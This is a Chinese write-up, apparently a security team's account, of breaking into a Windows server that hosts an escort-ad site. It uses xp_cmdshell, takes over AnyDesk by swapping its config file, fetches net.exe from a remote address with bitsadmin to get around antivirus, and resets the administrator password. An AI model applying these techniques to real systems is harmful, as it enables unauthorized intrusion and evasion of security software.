【实战】提权某找小姐网站服务器

目标是一个asp+Sqlserver+Windows Server 2008 R2,网站长啥样?

(未命名安全团队取证过程截图)

GetShell过程描述过于简单被小编我给砍掉了,不服来砍我!

(未命名安全团队取证过程截图)

接下来就开始提权了，先看一下端口，知道端口开放情况就知道运行了哪些关键服务，比如3306运行了MySQL，可以找root密码进行UDF或者MOF提权，1433可利用XP_CMDSHELL执行命令，43958可利用serv-u提权。

(别看说了这么多，其实本文只用了一个)

端口扫描结果:(看我干什么，看下面图)

(未命名安全团队取证过程截图)

可以看到开放了1433端口，这个3389其实是关闭的，并且做了入站出站规则，连接不了。这是我提权之后打开的，所以这里显示开放。去网站目录找一下数据库配置文件看能不能获取数据库账号和密码。

(未命名安全团队取证过程截图)

直接去执行命令吧 先看一下系统权限

(未命名安全团队取证过程截图)

再net user一下

(未命名安全团队取证过程截图)

看来net被做了权限 再找找其他的突破口，看看进程。

(未命名安全团队取证过程截图)

可以看到360+云锁，手上也没有免杀马，上不了远控了，不过看到进程里面有个anydesk，看起来有点像远程控制的软件，去百度一下这个进程。

(未命名安全团队取证过程截图)

没错，是个远程桌面软件，那么这个就是我们的突破点。先下载一个免费版的分析一下。

下载下来是个单文件，并没有提示安装，很奇怪， 捣鼓了一下这个软件，发现不设置自主访问密码的话需要人工点击接受才可以控制，如果在真实环境的话肯定不可能有人守着电脑给你点接受，肯定设置了密码的，所以我们就需要找密码。本来想着从窗口组件直接读取密码，但是翻了半天没有看到有显示密码的地方，那就有可能是保存在内存里面的了，设置好密码之后利用CE来寻找密码，我这里设置的xxxxx123,我们看看内存里有没有这个密码，如果在内存里的话我们可以写个工具来读取，找到他的基址+偏移读取或者搜索特征码+偏移来读取，后者的话比较稳当一点，因为如果 版本不一样的话基址也不一样的，这也就是为什么游戏更新之后外挂也需要更新，因为他们要重新导入基址。

(未命名安全团队取证过程截图)

可惜并没有。可能在内存里面这个密码是加密的，或者没有保存在内存里。但是问题又来了。这个文件只有一个单文件，如果软件重启了难道每次都要重新设置密码？肯定不存在的。除非开发傻 那接下来就找找看密码保存在哪里的。咱们用火绒剑对他进行动作监测。

(未命名安全团队取证过程截图)

这里过滤器模式选择进程名， 如果说对密码操作的功能点在哪的话，最好使的肯定是设置密码的地方，设置密码他肯定要更新密码，这样我们就能看到他进行了什么操作了。

(未命名安全团队取证过程截图)

在填写好密码之后切换到火绒剑点击开始监控 然后切换到anydesk点击应用。

(未命名安全团队取证过程截图)

这种东西反正要么是注册表保存要么就是文件保存，

过程反正就是open_file->write_file->close_file 注册表同理

我们看到火绒剑监测到的结果里面有文件操作，

咱们打开这个文件看一下

(未命名安全团队取证过程截图)

看来是加密了的，我太菜，加解密不熟，就不去捣鼓这个解密了。咱们把这个文件改成别的文件名备份一下，然后重新设置一个另外的密码，再把刚才备份的文件替换回去，看看是否能用原先的密码连接。

(未命名安全团队取证过程截图)

还是能连接的，这样我们去目标服务器上看看是不是也有这个配置文件存在。

(未命名安全团队取证过程截图)

也有，那我们直接上传替换试试。

(未命名安全团队取证过程截图)

不过失败了，再测试一下，是因为覆盖的原因还是因为没有写权限的原因，我们随便上传一个txt文件试试

(未命名安全团队取证过程截图)

看来有读写权限，但是不能直接覆盖，没关系，我们还有system权限 我们用XP_CMDSHELL进行覆盖，把我们的配置文件改个名传上去，然后用复制命令替换

copy C:ProgramDataAnyDeskservice0.conf　C:ProgramDataAnyDeskservice.conf

(未命名安全团队取证过程截图)

　OK,替换成功，连接一下。

(未命名安全团队取证过程截图)

成功连接，不过有点小问题，不能操作鼠标和键盘，发送快捷键按钮是灰色的不可用。想来是服务器那边权限配置问题，不过没关系，老规矩！火绒剑监测动作信息，找到配置文件路径，本地把权限设置后，然后覆盖到服务器

(未命名安全团队取证过程截图)

OK，可以操作了，不过被锁定了。找了半天也没有切换用户的地方， 之前说过net被做了权限，这种情况我们自己上传一个net就可以绕过，但是在上传的时候发现一个问题，只要上传的事可执行文件都会被拦截，就算改成txt后缀都上传不上去，想来是云锁在作妖 不过2008的系统自带下载器，我们远程下载就可以绕过，我们重新给他搞个net.exe

bitsadmin /transfer n 远程地址 保存文件地址

测试一下

(未命名安全团队取证过程截图)

由于服务器上有360，添加管理组的时候会被拦截，但是改密码不会被拦截，所以我们直接强改管理员密码 改完然后利用anydesk直接登录

(未命名安全团队取证过程截图)

本次取证结束,其他的事交给更专业的人去做吧。